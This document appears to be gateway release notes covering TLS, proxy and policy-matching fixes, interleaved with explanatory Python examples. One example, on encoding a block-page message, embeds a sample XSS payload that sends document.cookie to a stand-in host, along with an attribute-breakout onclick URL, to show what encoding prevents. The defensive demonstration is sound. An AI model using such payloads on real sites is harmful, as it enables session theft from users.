-
Fixes an occasional datapath instability when processing traffic from clients with post-quantum cryptography enabled. The
instability would trigger a datapath self-heal. With the fix, the datapath remains stable and no self-heal is needed.
-
Fixes a downstream issue related to obtaining the SNI when a browser-based client has post-quantum cryptography enabled. With
post-quantum cryptography the TLS Client Hello is large enough to be fragmented across multiple packets. If the first packet
arrived but the second never did, the Gateway would never release the CPU resources allocated to the session when the session
was cleaned up. This fix ensures that those CPU resources are released and do not build up over time.
-
Fixes an issue with establishing a full end-to-end session for legacy applications when using a TCP Forward Proxy Policy.
Examples of legacy applications could include SSHv1 and database management traffic (Oracle). For these types of applications,
after the TCP connection is established, the next packet will arrive from the server, not the client. In a TCP Forward Proxy
Policy, the Gateway first establishes the frontend TCP connection (client to Gateway) and expects the next packet to arrive
from the client, not the server. Since no packet ever arrives, the backend TCP connection (Gateway to server) is never established.
This results in no end-to-end session and the application communication will fail.
The fix relies on two inputs: (1) a gateway setting, and (2) an evaluation of the Policy Rule processing the traffic to
determine whether a domain evaluation (FQDN Match, FQDN Filtering) is configured. If both (1) and (2) are configured, the
gateway assumes the traffic is TLS encrypted and that the next packet to arrive will be the TLS Client Hello from the client.
If only (1) is configured, the gateway assumes the traffic is not TLS encrypted, so it does not wait for a packet from the
client and immediately establishes the backend connection. The next packet to arrive, whether from the client or the server,
then has a full end-to-end session through which it is forwarded to its intended destination.
When (1) is not configured and the traffic is TLS encrypted, the gateway obtains the domain from the TLS Client Hello SNI,
resolves it, and uses one of the resolved IPs as the destination for the backend connection. When (1) is configured, or
the traffic is not TLS encrypted, no domain can be obtained and no resolution is possible, so the frontend TCP connection's
destination IP is used as the backend TCP connection's destination IP.
Employing this fix requires a gateway setting. If you believe you are running into this issue, contact Cisco Support to
evaluate it and obtain information on how this setting can be enabled. In a future release, this behavior will be configurable
per rule, so that a rule can be created to segment this type of traffic and the change described above applies only to that
traffic.
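The server-speaks-first failure described above is easiest to see by running it. The following is an added example, not
Cisco code and not the gateway's implementation: a loopback proxy in Python asyncio is put in front of a constructed backend
that sends an SSHv1-style banner immediately after the TCP handshake. With `wait_for_client_first=True` the proxy behaves
like the pre-fix TCP Forward Proxy (it holds the backend connect until the client speaks, which the client never does), so
no end-to-end session forms. With `False` it behaves like the fixed non-TLS path and connects the backend at once using the
frontend destination. The banner, ports and timeouts are all assumptions made for the demo.

```python
import asyncio
import functools

# Constructed sample banner for a server-speaks-first protocol (SSHv1-style):
# the server talks first, so a proxy waiting for the client's first bytes stalls.
BANNER = b"SSH-1.5-LegacyServer\r\n"
LOOPBACK = "127.0.0.1"


async def legacy_server(reader, writer):
    """Backend: send the banner as soon as the connection is up, then wait for the client."""
    writer.write(BANNER)
    await writer.drain()
    await reader.read(1024)          # whatever the client says (or EOF)
    writer.close()


async def pump(src, dst):
    """Copy bytes in one direction until EOF, then close the far side."""
    try:
        while True:
            data = await src.read(4096)
            if not data:
                break
            dst.write(data)
            await dst.drain()
    finally:
        dst.close()


async def proxy_conn(reader, writer, backend_port, wait_for_client_first, idle_timeout):
    """Frontend accepted. wait_for_client_first=True models the pre-fix behaviour: the
    backend connect is held until the client speaks (required for TLS, where the Client
    Hello carries the SNI). False models the fixed non-TLS path: connect the backend
    immediately using the frontend destination."""
    first = b""
    if wait_for_client_first:
        try:
            first = await asyncio.wait_for(reader.read(4096), timeout=idle_timeout)
        except asyncio.TimeoutError:
            writer.close()               # client never speaks: no end-to-end session forms
            return
    breader, bwriter = await asyncio.open_connection(LOOPBACK, backend_port)
    if first:
        bwriter.write(first)
        await bwriter.drain()
    await asyncio.gather(pump(reader, bwriter), pump(breader, writer))


async def legacy_client(proxy_port, timeout):
    """Client of a server-speaks-first protocol: it waits for the banner before talking."""
    reader, writer = await asyncio.open_connection(LOOPBACK, proxy_port)
    try:
        banner = await asyncio.wait_for(reader.readline(), timeout=timeout)
    except asyncio.TimeoutError:
        banner = b""
    writer.close()
    return banner


async def run_scenario(wait_for_client_first, idle_timeout=0.5):
    server = await asyncio.start_server(legacy_server, LOOPBACK, 0)
    backend_port = server.sockets[0].getsockname()[1]
    handler = functools.partial(proxy_conn, backend_port=backend_port,
                                wait_for_client_first=wait_for_client_first,
                                idle_timeout=idle_timeout)
    proxy = await asyncio.start_server(handler, LOOPBACK, 0)
    proxy_port = proxy.sockets[0].getsockname()[1]
    try:
        return await legacy_client(proxy_port, timeout=idle_timeout * 4)
    finally:
        proxy.close()
        server.close()


def compare():
    """Banner seen by the client under each proxy behaviour (b"" means no session formed)."""
    return {
        "wait_for_client_first": asyncio.run(run_scenario(True)),
        "connect_backend_immediately": asyncio.run(run_scenario(False)),
    }


if __name__ == "__main__":
    for mode, banner in compare().items():
        print(f"{mode}: {banner!r}")
```

The idle timeout stands in for the gateway's session cleanup; in the real device the frontend would simply sit idle until the
application gave up. Note that the immediate-connect path is only safe when the rule has no domain evaluation, since the
backend destination is taken from the frontend 5-tuple rather than from an SNI that has not arrived yet.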
-
Fixes an issue with a Group Address Object exclusion list where the IPs/CIDRs specified in the excluded Address Objects were
not properly applied to the gateway policy. This ensures that both the included and excluded Address Objects are applied for
proper traffic matching.
-
Fixes an issue where a gateway in GCP could bounce between healthy and unhealthy due to Health Check Service failing, potentially
resulting in instance replacement.
-
Fixes an issue where some long-lived active connections would not be properly reset (TCP RST) during gateway replacement,
policy change or timeout expiry.
-
Fixes an issue where a change in a new Talos Ruleset could prevent the Ruleset from being applied to the gateway, leaving
the gateway stuck in the Policy Ruleset Status "Updating..." state. The issue was caught before the new Talos Rulesets were
published and is resolved with this update, so new Talos Rulesets can be applied successfully.
-
Fixes an issue where traffic processing on an Ingress Gateway could cause high CPU, resulting in an unnecessary auto-scale.
The high CPU resulted from a connection that was initially processed by a policy using an unencrypted HTTP proxy and then
handed to an encrypted TCP proxy after an HTTP redirect.
-
Fixes an issue related to a UDP connection pool leak caused by specific UDP session behavior that could eventually result
in a datapath restart. When the datapath restart occurs, the instance will be unhealthy for the duration of the restart. If
that unhealthy period is long enough, the Controller will mark the instance for replacement.
-
Fixes an issue where an Egress Gateway Forward Proxy policy could get stuck in attempting to match traffic to the proper Policy
Rule.
-
Fixes an issue where a gateway could unnecessarily consume CPU in a proxy scenario where the backend connection is unresponsive,
causing delays in processing traffic.
-
Fixes a gateway crash that is caused by detection of malware in an Ingress Gateway reverse proxy policy.
-
Fixes an issue where a TLS session that offers Kyber (hybrid post-quantum) key exchange could cause increased CPU usage, resulting
in the inability to process traffic.
-
Fixes a stability issue where the Gateway datapath could self-heal when proxied sessions are actively terminated during policy
change or gateway instance replacement.
-
Fixes an issue where the generation of a Diagnostic Bundle could fail.
-
Fixes an issue where a Forwarding SNAT Policy could not retrieve the Server Name Indication (SNI) from a TLS Client Hello
message, causing the Gateway to close the connection with a TCP RST. This is caused by a change made in Chrome in April 2024
to shift to Post-Quantum Cryptography. With this change, the Client Hello is larger than 1415 bytes, which can result in an
inability to retrieve the SNI that the policy uses to match or filter by domain. The fix ensures the Forwarding SNAT Policy
can support Client Hello sizes greater than 1415 bytes.
-
Fixes an issue where a proxy policy could not retrieve the SNI from a TLS Client Hello message, causing the Gateway to close
the connection with a TCP RST. This is caused by a change made in Chrome in April 2024 to shift to Post-Quantum Cryptography.
With this change, the Client Hello is larger than 1415 bytes, which can result in an inability to retrieve the Server Name
Indication (SNI) that the proxy uses to determine which certificate to issue. The fix ensures the proxy policy can support
Client Hello sizes greater than 1415 bytes.
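The three Client Hello fixes above (the leaked per-session CPU when the second fragment never arrives, and the two SNI
retrieval failures past 1415 bytes) share one root cause: SNI extraction that looks only at the first TCP segment. The
following is an added example, not Cisco code and not the gateway's parser, showing the correct approach: buffer per
connection until the TLS record length is satisfied, then walk the ClientHello to the server_name extension. The hello is
constructed in the block; a padding extension stands in for the hybrid post-quantum key share that pushes real hellos past
1415 bytes, and the sample assumes the hello fits in a single TLS record (true for today's browser hellos, which are well
under 16 KB).

```python
import struct

TLS_HANDSHAKE = 0x16       # TLS record content type: handshake
HS_CLIENT_HELLO = 0x01     # handshake message type: ClientHello
EXT_SERVER_NAME = 0x0000   # SNI extension (RFC 6066)
EXT_PADDING = 0x0015       # padding extension (RFC 7685), used here to bulk up the hello
TCP_SEGMENT = 1415         # payload size at which the release notes say the hello fragments


def build_client_hello(sni: str, pad_to: int = 0) -> bytes:
    """Constructed sample: a minimal ClientHello (one cipher suite, no key share)
    carrying an SNI extension. pad_to inflates it with a padding extension so it
    exceeds one TCP segment, standing in for a hybrid post-quantum key share."""
    host = sni.encode("ascii")
    name_list = b"\x00" + struct.pack("!H", len(host)) + host          # host_name entry
    sni_ext = (struct.pack("!HH", EXT_SERVER_NAME, len(name_list) + 2)
               + struct.pack("!H", len(name_list)) + name_list)
    fixed = (b"\x03\x03" + b"\x11" * 32   # legacy_version + random (constant for the sample)
             + b"\x00"                    # session id length 0
             + b"\x00\x02\x13\x01"        # cipher_suites: TLS_AES_128_GCM_SHA256
             + b"\x01\x00")               # compression_methods: null

    def assemble(exts: bytes) -> bytes:
        hs_body = fixed + struct.pack("!H", len(exts)) + exts
        hs = bytes([HS_CLIENT_HELLO]) + len(hs_body).to_bytes(3, "big") + hs_body
        return bytes([TLS_HANDSHAKE]) + b"\x03\x01" + struct.pack("!H", len(hs)) + hs

    record = assemble(sni_ext)
    if pad_to > len(record) + 4:
        pad_len = pad_to - len(record) - 4   # 4 = padding extension header
        record = assemble(sni_ext + struct.pack("!HH", EXT_PADDING, pad_len) + b"\x00" * pad_len)
    return record


def parse_sni(handshake: bytes):
    """Walk a ClientHello handshake message and return the host_name SNI, or None."""
    if not handshake or handshake[0] != HS_CLIENT_HELLO:
        return None
    body = handshake[4:4 + int.from_bytes(handshake[1:4], "big")]
    p = 2 + 32                                        # skip legacy_version and random
    p += 1 + body[p]                                  # session_id
    p += 2 + struct.unpack("!H", body[p:p + 2])[0]    # cipher_suites
    p += 1 + body[p]                                  # compression_methods
    if p + 2 > len(body):
        return None                                   # no extensions block
    end = p + 2 + struct.unpack("!H", body[p:p + 2])[0]
    p += 2
    while p + 4 <= end:
        etype, elen = struct.unpack("!HH", body[p:p + 4])
        edata = body[p + 4:p + 4 + elen]
        p += 4 + elen
        if etype != EXT_SERVER_NAME:
            continue
        q, list_end = 2, 2 + struct.unpack("!H", edata[:2])[0]
        while q + 3 <= list_end:
            ntype, nlen = edata[q], struct.unpack("!H", edata[q + 1:q + 3])[0]
            if ntype == 0:                            # host_name
                return edata[q + 3:q + 3 + nlen].decode("ascii", "replace")
            q += 3 + nlen
    return None


class ClientHelloReassembler:
    """Per-connection buffer that waits for the whole ClientHello record before
    looking for the SNI. feed() returns ("need_more", None) while the hello is
    incomplete, ("not_tls", None) if the first bytes are not a TLS handshake
    record, or ("sni", hostname) once the record is complete. A connection left
    in "need_more" is exactly the state that must be freed on session cleanup."""

    def __init__(self):
        self.buf = b""

    def feed(self, data: bytes):
        self.buf += data
        if len(self.buf) < 5:
            return ("need_more", None)
        ctype, major, _minor, rlen = struct.unpack("!BBBH", self.buf[:5])
        if ctype != TLS_HANDSHAKE or major != 3:
            return ("not_tls", None)
        if len(self.buf) < 5 + rlen:                  # sample assumes one TLS record
            return ("need_more", None)
        return ("sni", parse_sni(self.buf[5:5 + rlen]))


def demo(total_size: int = 1700):
    """Deliver a padded hello one TCP segment at a time and record each state."""
    hello = build_client_hello("app.example.com", pad_to=total_size)
    segments = [hello[i:i + TCP_SEGMENT] for i in range(0, len(hello), TCP_SEGMENT)]
    r = ClientHelloReassembler()
    states = [r.feed(seg) for seg in segments]
    return len(hello), len(segments), states


if __name__ == "__main__":
    print(demo())
    print(ClientHelloReassembler().feed(b"SSH-1.5-legacy\r\n"))
```

A policy engine built on this must bound the buffer (a 16 KB record cap is enough for a hello) and attach a timer to every
connection still in `need_more`, so that a client that sends the first fragment and disappears does not keep per-session
state, and the CPU accounted to it, alive indefinitely.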
-
Fixes an issue where a DNS change for a domain used in an FQDN-based Address Object was received by the gateway datapath
agent but not applied to the datapath workers. As a result, the dynamic Address Object did not reflect the DNS change,
impacting proper traffic processing.
-
Fixes issues in the Anti-Malware engine where known malware was not being detected and blocked. The fix includes an update
of the anti-malware engine.
-
Fixes an issue where malware signature detection was intermittent.
-
Fixes an issue where the gateway-side cipher suites used in a Gateway SSH session could be flagged as weak. The fix restricts
the gateway to GCM-based cipher suites only.
-
Fixes an issue where a Decryption Profile that is configured differently than the default configuration would not properly
apply to the gateway, resulting in TLS negotiation failures due to cipher suite mismatches between the client and the gateway.
-
Fixes the recording of Stats related to Active Connections and Connection Rate where UDP sessions were not being properly
counted.
-
Fixes an issue where the Gateway would self-heal if an empty FQDN/URL Filtering Profile was assigned to a Policy Rule Set
rule.
-
Fixes a Deny Rule Action issue related to the use of domains as a 6-tuple match. If the first Rule matched is a 6-tuple
match (includes an assigned FQDN Match Profile) and its Policy Action is set to Deny, the Deny action was based on the 5-tuple
match alone and did not take the domain into consideration. This fix ensures that all six tuples are considered when evaluating
the Rule and its action. If the traffic does not match the Rule on the 6-tuple match, evaluation refines to a subsequent
Rule and the action is taken based on that matched Rule's configuration.
-
Fixes an issue where an Azure Ingress Gateway can get stuck in the Health Checking Pending state after a policy update is
applied. This issue also affects new gateway deployments.
-
Fixes an issue related to the use of GeoIP. Countries with many providers have a very large number of advertised prefixes.
When those country codes are used in a GeoIP Address Group, the Address Group will contain a large number of CIDR blocks.
The GeoIP Address Group was restricted to 64,000 CIDRs where exceeding this limit would result in a partial set of CIDRs applied
to the policy. This fix relaxes the limit to ensure the full set of CIDRs will be applied to the policy. It is recommended
to use an 8-core instance type due to the additional memory requirements imposed by GeoIP.
-
Fixes an issue where an Egress Policy Rule Set that uses a decryption-based Forward Proxy (TLS, HTTPS, WebsocketS) is initially
matching on 5-tuple and retrieving the domain from the SNI, but not performing a match refinement based on the 6th tuple resulting
in a TLS error. The fix ensures that 6-tuple match refinement occurs such that the traffic can be successfully processed by
the proper decryption rule.
-
Fixes an issue where sessions with TLS negotiation errors were not recording the SNI as a Traffic Summary -> Event.
-
Fixes an Allow Rule match issue related to the use of domains as a 6-tuple match. If the first Rule matched is a 6-tuple
match (includes an assigned FQDN Match Profile), its Policy Action is set to Allow, and no subsequent Rule is consistent with
the first Rule's 5-tuple match, then all domains were allowed instead of only the matched domains. This fix ensures that
only the domains matched by the Rule are allowed and all other domains are denied.
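The three 6-tuple fixes above (the Deny rule that ignored its FQDN Match Profile, the decryption rule that never refined
past the 5-tuple match, and the Allow rule that let every domain through) are the same defect seen from three rules. The
following is an added example, not Cisco code and not the gateway's policy engine: a small rule evaluator with the pre-fix
behaviour (first 5-tuple hit decides) next to the fixed behaviour (a rule with an FQDN Match Profile whose domain does not
match is skipped and evaluation refines to the next rule, falling through to implicit deny). The rule shape, the pattern
syntax and the sample policy are assumptions for the demo.

```python
from dataclasses import dataclass, field
from fnmatch import fnmatchcase
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    dport: int


@dataclass
class Rule:
    name: str
    src: str                 # CIDR
    dst: str                 # CIDR
    proto: str
    dport: int               # 0 matches any port
    action: str              # "allow" or "deny"
    fqdn_match: list = field(default_factory=list)  # FQDN Match Profile patterns; empty = 5-tuple only


def match_5tuple(rule: Rule, flow: Flow) -> bool:
    return (ip_address(flow.src) in ip_network(rule.src)
            and ip_address(flow.dst) in ip_network(rule.dst)
            and rule.proto == flow.proto
            and rule.dport in (0, flow.dport))


def match_domain(rule: Rule, sni) -> bool:
    """6th tuple: the SNI must match one of the profile's patterns (case-insensitive)."""
    return sni is not None and any(fnmatchcase(sni.lower(), pat.lower()) for pat in rule.fqdn_match)


def evaluate_pre_fix(rules, flow: Flow, sni):
    """Pre-fix behaviour: the first 5-tuple match decides the action, so the FQDN Match
    Profile never influences a Deny and an Allow covers every domain."""
    for rule in rules:
        if match_5tuple(rule, flow):
            return rule.name, rule.action
    return "implicit", "deny"


def evaluate_fixed(rules, flow: Flow, sni):
    """Fixed behaviour: a 6-tuple rule whose domain does not match is skipped and
    evaluation refines to the next rule; nothing matching falls to implicit deny."""
    for rule in rules:
        if not match_5tuple(rule, flow):
            continue
        if rule.fqdn_match and not match_domain(rule, sni):
            continue                       # domain refinement: keep looking
        return rule.name, rule.action
    return "implicit", "deny"


# Constructed policy: a Deny 6-tuple rule ahead of an Allow 6-tuple rule, same 5-tuple.
RULES = [
    Rule("block-bad", "10.0.0.0/8", "0.0.0.0/0", "tcp", 443, "deny", ["*.badsite.example"]),
    Rule("allow-app", "10.0.0.0/8", "0.0.0.0/0", "tcp", 443, "allow", ["app.example.com"]),
]
FLOW = Flow("10.1.2.3", "203.0.113.5", "tcp", 443)


def compare(rules, flow, sni):
    return {"pre_fix": evaluate_pre_fix(rules, flow, sni), "fixed": evaluate_fixed(rules, flow, sni)}


if __name__ == "__main__":
    for host in ("app.example.com", "evil.badsite.example", "other.example.net"):
        print(host, compare(RULES, FLOW, host))
```

In a real datapath the 5-tuple decision is made at the SYN, before any SNI exists; the point of the fix is that a 6-tuple
rule's verdict stays provisional until the Client Hello arrives and the domain either confirms the rule or sends evaluation
on to the next one.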
-
Fixes an issue where a TCP reset was not being sent for traffic processed by a Forward policy with a Deny action that uses
an FQDN Match Profile when Reset on Deny is enabled.
-
Fixes an issue where multiple SNI events were being recorded for each Forward Proxy full decrypted session.
-
Fixes an issue where the Address Group size could be exceeded, causing all IPs/CIDRs in excess of the size to not be included
in the Address Group. The Address Group size has been increased to 20,000 IPs/CIDRs.
-
Adds a System Log message if the GeoIP limitations of the gateway are exceeded.
-
Fixes an issue where the wrong action could be taken for URL Filtering Category matching when the URL is not found in the
cache and the attempt to retrieve its category times out.
-
Updates gateway libraries to address various CVEs.
-
Fixes various issues with updating the private key of a certificate when the certificate is configured to retrieve its private
key from a CSP service such as Key Vault, Secrets Manager or KMS. The fix ensures that any update to the resource in the CSP
service is detected by the gateway, which then retrieves the updated key and uses it during traffic processing.
-
Ensures that a user with administrator access to configure a URL Filtering Profile cannot use the custom URL response to inject
JavaScript. The fix enforces HTML encoding of the custom URL response.
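The following is an added example, not Cisco code and not the gateway's block page, of the encoding the fix above describes:
a block-page renderer that interpolates an administrator-supplied message verbatim next to one that HTML-encodes every
untrusted value for the context it lands in. The page template, the sample message and the helper names are assumptions;
the extra scheme check on the href is a caveat added here, because encoding alone does not neutralise a `javascript:` URL
inside an attribute.

```python
import html
from urllib.parse import urlsplit

# Constructed sample of what a policy administrator might type into the custom
# URL Filtering response field (not a real configuration value).
CUSTOM_MESSAGE = ('Access denied by policy <script>document.location='
                  '"https://attacker.example/?c="+document.cookie</script>')
CATEGORY = "Malware & Phishing"


def render_block_page_unsafe(message: str, category: str, url: str) -> str:
    """Pre-fix shape: administrator text is interpolated verbatim, so an admin (or
    anyone holding that role's credentials) runs script in every user's browser
    that lands on the block page."""
    return (f"<html><body><h1>Blocked</h1><p>{message}</p>"
            f'<p>Category: {category}</p><p>URL: <a href="{url}">{url}</a></p></body></html>')


def safe_href(url: str) -> str:
    """Encoding does not make a URL safe inside href: javascript:alert(1) is valid
    markup once encoded. Allow only http/https; anything else becomes a harmless '#'."""
    return url if urlsplit(url).scheme.lower() in ("http", "https") else "#"


def render_block_page_safe(message: str, category: str, url: str) -> str:
    """Fixed shape: every untrusted value is HTML-encoded. quote=True also encodes
    quotes, which is what prevents breaking out of the href attribute."""
    esc = lambda s: html.escape(s, quote=True)  # noqa: E731 (kept short for the demo)
    return (f"<html><body><h1>Blocked</h1><p>{esc(message)}</p>"
            f'<p>Category: {esc(category)}</p>'
            f'<p>URL: <a href="{esc(safe_href(url))}">{esc(url)}</a></p></body></html>')


def contains_active_markup(page: str) -> bool:
    """Crude check used by the demo: a script tag or an attribute breakout survived."""
    low = page.lower()
    return "<script" in low or '" onclick=' in low


if __name__ == "__main__":
    url = 'http://bad.example/x" onclick="alert(1)'
    print("unsafe page executes script:", contains_active_markup(render_block_page_unsafe(CUSTOM_MESSAGE, CATEGORY, url)))
    print("safe page executes script:  ", contains_active_markup(render_block_page_safe(CUSTOM_MESSAGE, CATEGORY, url)))
    print(render_block_page_safe(CUSTOM_MESSAGE, CATEGORY, url))
```

The lesson generalises past the custom message: the blocked URL and the category name are attacker-influenced too (the URL
entirely so), and each needs encoding for its own context, text node or attribute, rather than a single filter applied to
the one field that happened to be reported.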
-
Fixes an issue where changing the PCAP for a Web Protection (WAF) or Network Intrusion (IDS/IPS) Profile would unnecessarily
trigger a blue/green datapath replacement.
-
Fixes an issue where enabling or disabling PCAP in a Network Intrusion (IDS/IPS) Profile would unnecessarily trigger a blue/green
datapath restart.
-
Fixes an issue where enabling or disabling SNAT in a Forwarding Service Object would unnecessarily trigger a blue/green datapath
restart.
-
Fixes an issue where changing the name of an Advanced Security Profile (WAF, IDS/IPS, Anti-Malware, etc.) would unnecessarily
trigger a blue/green datapath replacement.